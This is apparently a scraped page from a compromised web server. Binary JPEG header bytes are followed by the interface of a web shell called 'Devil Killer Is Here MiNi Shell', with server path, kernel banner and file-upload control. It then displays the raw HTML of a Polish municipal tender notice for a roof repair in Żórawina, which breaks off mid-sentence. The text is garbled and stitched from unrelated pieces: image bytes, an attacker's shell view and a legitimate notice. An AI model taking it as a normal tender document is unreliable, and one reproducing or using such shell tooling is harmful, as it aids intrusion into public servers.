JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220805/0029348301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont dachu budynku Urzędu Gminy w Żórawinie – postępowanie II </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Urząd Gminy w Żórawinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931935141</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kolejowa 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Żórawina</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@zorawina.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zorawina.bip.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont dachu budynku Urzędu Gminy w Żórawinie – postępowanie II </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f968190b-1488-11ed-b950-8227d40187e8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00293483</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00029872/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Modernizacja budynku Urzędu Gminy w m. Żórawina, ul. Kolejowa 6</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zorawina.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zorawina.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne wysyłania i<br/>odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy<br/>użyciu Platformy:<br/>a) Dopuszczalne przeglądarki internetowe:<br/>− Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11,<br/>− Google Chrome 31<br/>− Mozilla Firefox 26<br/>− Opera 18<br/>b) Pozostałe wymagania techniczne:<br/>− dostęp do sieci Internet<br/>− obsługa przez przeglądarkę protokołu XMLHttpRequest - ajax<br/>− włączona obsługa JavaScript<br/>− zalecana szybkość łącza internetowego powyżej 500 KB/s<br/>− zainstalowany Acrobat Reader<br/>- zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy<br/>c) Wspierane są rozwiązania dostarczane przez firmy:<br/>− Polskie Centrum Certyfikacji Elektronicznej Sigillum Polskiej Wytwórni Papierów Wartościowych S.A.<br/>− Centrum Obsługi Podpisu Elektronicznego Szafir Krajowej Izby Rozliczeniowej S.A.<br/>− Powszechne Centrum Certyfikacji Certum firmy Asseco Data Systems S.A. (dawniej: Unizeto Technologies SA.)<br/>− Kwalifikowane Centrum certyfikacji Kluczy CenCert firmy Safe Technologies S.A.<br/>3) Dopuszczalne format przesyłanych danych<br/>image/bmp, image/x-windows-bmp, application/msword, application/drafting, image/gif, application/x-compressed, application/x-gzip,<br/>multipart/x-gzip, image/jpeg, image/pjpeg, application/x-latex, application/pdf, image/pict, image/png, application/mspowerpoint,<br/>application/postscript, application/rtf, application/x-rtf, text/richtext, image/tiff, image/x-tiff, application/mswrite, application/excel,<br/>application/x-excel, application/vnd.ms-excel, application/x-msexcel, application/vnd.ms-excel, text/xml, application/x-zipcompressed,<br/>application/zip, application/vnd.ms-office, image/x-ms-bmp, video/x-msvideo, audio/x-ms-wma,<br/>application/vnd.oasis.opendocument.spreadsheet, application/acad, application/x-acad, application/autocad_dwg, image/x-dwg,<br/>application/dwg, application/x-dwg, application/x-autocad, image/vnd.dwg, drawing/dwg<br/>4) Kodowanie i oznaczenie czasu przekazania danych<br/>Czas zapisywany jest w formacie YYYY-MM-DD HH:MM:SS. Za datę przekazania oferty, zawiadomień, dokumentów<br/>elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>wpływu na Platformę, a nie datę wykonania danej czynności przez Wykonawcę na Platformie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający informuje, że Administratorem danych osobowych jest Wójt Gminy<br/>Żórawina, ul. Kolejowa 6, 55-020 Żórawina, tel. 71 38 14 111, e-mail: urzad@zorawina.pl<br/>2. W sprawach związanych z przetwarzaniem danych osobowych, można kontaktować się z Inspektorem Ochrony Danych, którym<br/>jest Mariusz Opaliński za pośrednictwem adresu e-mail: iod@zorawina.pl.<br/>Dane osobowe będą przetwarzane w celu przeprowadzenia postępowania o udzielenie zamówienia publicznego pn. : Remont dachu<br/>budynku Urzędu Gminy w Żórawinie - postępowanie II<br/>3. Podstawę prawną przetwarzania danych osobowych stanowi ustawa Prawo zamówień publicznych oraz wyrażenie zgody w<br/>momencie złożenia oferty, gdy wykonawcą jest osoba fizyczna prowadząca działalność gospodarczą.<br/>4. Dane osobowe będą ujawniane Wykonawcom oraz wszystkim zainteresowanym, a także podmiotom przetwarzającym dane na<br/>podstawie zawartych umów, zgodnie z art. 74 PZP.<br/>5. Dane osobowe Wykonawcy będą przechowywane przez okres obowiązywania umowy a następnie 5 lat, albo 15 lat w przypadku<br/>zamówień współfinansowanych ze środków UE, począwszy od 1 stycznia roku kalendarzowego następującego po zakończeniu<br/>okresu obowiązywania umowy. Okresy te dotyczą również Wykonawców, którzy złożyli oferty i nie zostały one uznane, jako<br/>najkorzystniejsze (nie zawarto z tymi Wykonawcami umowy).<br/>6. Osobie, której dane dotyczą przysługuje prawo dostępu do danych a także, na warunkach określonych w przepisach<br/>Rozporządzenia Parlamentu i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE, prawo<br/>sprostowania danych, ich usunięcia oraz ograniczenia przetwarzania. Osobie, której dane dotyczą przysługuje prawo wniesienia skargi do organu nadzorczego.<br/>7. Podanie danych osobowych bezpośrednio osoby, której dane dotyczą jest wymogiem ustawowym określonym w przepisach<br/>ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Brak ich podania może uniemożliwić<br/>Zamawiającemu dokonanie oceny spełniania warunków udziału w postępowaniu oraz zdolności Wykonawcy do należytego<br/>wykonania zamówienia, co skutkować może wykluczeniem Wykonawcy z postępowania lub odrzuceniem jego oferty.<br/>8. W odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy<br/>95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej RODO.<br/>9. Osoba, której dane dotyczą ma prawo:<br/>1) na podstawie art. 15 RODO dostępu do danych osobowych jej dotyczących,<br/>2) na podstawie art. 16 RODO do sprostowania danych osobowych;<br/>3) na podstawie art. 18 RODO żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO,<br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że przetwarzanie danych osobowych,<br/>które jej dotyczą narusza przepisy RODO.<br/>10. Dane nie będą udostępniane poza obszar EOG.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WG.271.10.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem inwestycji jest remont pokrycia dachowego istniejącego budynku Urzędu Gminy w Żórawinie przy ul. Kolejowej<br/>6 na działce o nr geodezyjnym 389/14, AM-1, obręb Żórawina, Powiat Wrocławski. Budynek wpisano do rejestru zabytków<br/>decyzją nr 689/W WKZ we Wrocławiu z dnia 20 kwietnia 1994 r.<br/>Remont pokrycia dachowego obejmuje: przełożenie istniejącego pokrycia z wymianą uszkodzonych elementów - dachówka<br/>ceramiczna &#34;karpiówka&#34; płaska układana podwójnie w koronkę oraz ewentualnie wymianę i uzupełnienia izolacji termicznej<br/>od zewnątrz oraz łacenia. Remont obejmuje również wymianę obróbek blacharskich rynien i rur spustowych. Obróbki<br/>blacharskie, rynny i rury spustowe należy wykonać z blachy tytanowo - cynkowej szarej w kolorze naturalnej patyny (np. VM<br/>ZINC QUARTZ-ZINC)<br/>- Rozebranie istniejącego pokrycia z dachówki karpiówki oraz wymiana nie nadających się do ponownego użycia<br/>poszczególnych dachówek<br/>- Wymiana łacenia dachu przy założeniu, wykorzystania istniejących łat w ilości 70%<br/>- Rozbiórka istniejących obróbek blacharskich z blachy stalowej ocynkowanej nienadającej się do dalszego użytku<br/>- Impregnacja więźby dachowej, łat i kontrłat preparatem ognioochronnym<br/>- Założenie na krokwiach foli dachowej, zbrojonej, paroprzepuszczalnej, mocując ją do krokwi za pomocą kontrłat i gwoździ<br/>ocynkowanych<br/>- Wykonanie obróbek blacharskich: kominów, pasów nadrynnowych, koszy, rynien i rur spustowych z blachy stalowej<br/>ocynkowanej<br/>- Pokrycie dachu dachówką karpiówką, ceglastą w koronkę z dodatkami<br/>- Zamontowanie płotków dachowych przeciwśnieżnych<br/>- Wykonanie ław i stopni kominiarskich systemowych na wspornikach stalowych ocynkowanych lub malowanych<br/>- Miniowanie i dwukrotne malowanie wyłazów dachowych i okienek dachowych<br/>- Wymiana instalacji piorunochronnej wraz z osprzętem<br/>Prace należy wykonać zgodnie opisem dokumentacją projektową, Decyzją nr 1860 z dnia 10.08.2020 r. Dolnośląskiego<br/>Wojewódzkiego Konserwatora Zabytków we Wrocławiu, Decyzją nr 2517/2020 z dnia 19.08.2020 r. Starostwa Powiatu<br/>Wrocławskiego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45261910-6 - Naprawa dachów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający<br/>przewiduje możliwość udzielenia Wykonawcy zamówień polegających na powtórzeniu podobnych robót budowlanych, o których<br/>mowa w art. 214 ust. 1 pkt. 7 PZP.<br/>Zamówienia takie:<br/>1. zostaną udzielone na podstawie odrębnej umowy lub umów zawartych z Wykonawcą w trybie zamówienia z wolnej ręki na<br/>podstawie art. 214 ust. 1 pkt. 7 PZP;<br/>2. nie będą łącznie przekraczać kwoty do 50% wartości ofertowej wykonawcy ;<br/>3. mogą zostać udzielone w terminie 3 lat od dnia udzielenia zamówienia podstawowego;<br/>4. mogą objąć swoim zakresem w szczególności:<br/>- remont tynków na kominach,<br/>- pobiałkowanie kominów,<br/>- wymiana obróbek blacharskich<br/>- montaż ław kominiarskich,<br/>- wymiana okien włazowych,<br/>- wymiana dachówki karpiówki,<br/>- wymiana rynien,<br/>- wymiana rur spustowych,<br/>- wymiana obróbek blacharskich,<br/>- wymiana łat i położenie foli termoizolacyjnej,<br/>- wymiana elementów drewnianych, z blachy na elewacji.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wykonawca dokonuje wyliczenia ceny w Formularzu ofertowym stanowiącym załącznik 1 do SWZ, na<br/>podstawie kosztorysu ofertowego stanowiącego załącznik 1.1. do SWZ. Kosztorys ofertowy jest integralną częścią oferty. Nie<br/>złożenie przedmiotowego załącznika skutkować będzie odrzuceniem oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie określa warunku w tym zakresie.<br/>2) sytuacji ekonomicznej i finansowej, tj.:<br/>2.1) posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia na sumę gwarancyjną min.: 100 000,00 zł<br/>UWAGA:<br/>1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki określone w ppkt 2.1)<br/>Wykonawcy muszą spełniać łącznie.<br/>W przypadku, jeśli wartość została wyrażona w walucie innej niż złoty, przeliczenia wartości należy dokonać z<br/>zastosowaniem średniego kursu NBP z dnia zamieszczenia ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień<br/>Publicznych, a jeśli w tym dniu nie określono takiego kursu, z zastosowaniem średniego kursu NBP z następnego<br/>najbliższego dnia po dniu zamieszczenia ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.<br/>3) zdolności technicznej lub zawodowej, tj.:<br/>3.1) w okresie ostatnich pięciu lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, należycie wykonali co najmniej 2 roboty polegające na wykonaniu remontu dachu o<br/>wartości każdej z nich minimum: 100 000,00 zł brutto z podaniem ich rodzaju oraz daty i miejsca wykonania oraz<br/>załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie<br/>UWAGA:<br/>1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki określone w ppkt 3.1)<br/>Wykonawcy muszą spełniać łącznie.<br/>2. Przez budowę, o której mowa w treści warunku należy rozumieć budowę w rozumieniu art. 3 pkt 6) ustawy z dnia 7 lipca<br/>1994 r. Prawo Budowlane (t. j. Dz. U z 2021 r.. poz. 2351).<br/>3.2) Wykonawca dysponuje 1 osobą do pełnienia funkcji Kierownika budowy posiadającą ważne uprawnienia budowlane<br/>bez ograniczeń, specjalności konstrukcyjno-budowlanej,<br/>- doświadczenie w pełnieniu obowiązków kierownika budowy przez co najmniej 18 m-c przy robót budowlanych przy<br/>zabytkach nieruchomych wpisanych do rejestru lub inwentarza zabytków. Zamawiający wymaga wskazania nr rejestru<br/>zabytku, adresu realizowanej roboty oraz daty wykonywania.<br/>W przypadku Wykonawców zagranicznych, dopuszcza się równoważne kwalifikacje, zdobyte w innych państwach, na<br/>zasadach określonych w art. 12a Ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz. U. z 2021 r., poz. 2351).<br/>UWAGA:<br/>1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunki określone powyżej w<br/>odniesieniu do personelu, Wykonawcy muszą spełniać łącznie.<br/>2. Zamawiający określając wymogi w zakresie posiadanych uprawnień budowlanych bez ograniczeń do wykonywania<br/>samodzielnych funkcji technicznych w budownictwie w zakresie poszczególnych specjalności wskazał na przepisy ustawy z<br/>dnia 7 lipca 1994 r. Prawo Budowlane (t. j. z 2021 r. Dz. U. poz. 2351), tym niemniej Zamawiający będzie brał pod uwagę<br/>także odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów<br/>prawa. Zamawiający będzie honorował także uprawnienia do wykonywania danej działalności, które zostały uznane w<br/>zakresie i na zasadach opisanych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2021 r. poz. 1646). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.1)<br/>dokumenty potwierdzające, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego;<br/>1.2) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert w<br/>postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty,<br/>miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty<br/>budowlane zostały wykonane należycie, , przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest<br/>w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Zaleca się sporządzenie wykazu na wzorze, który stanowi<br/>Załącznik 5 do IDW;<br/>1.3) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług jako kierownika budowy wraz z informacjami na temat ich uprawnień, zakresu wykonywanych czynności oraz<br/>informacją o podstawie dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Kosztorys ofertowy stanowiący załącznik nr 1.1. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Kosztorys ofertowy stanowiący załącznik nr 1.1. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymagać będzie wniesienia wadium w wysokości: 2 000,00 zł ( słownie: dwa 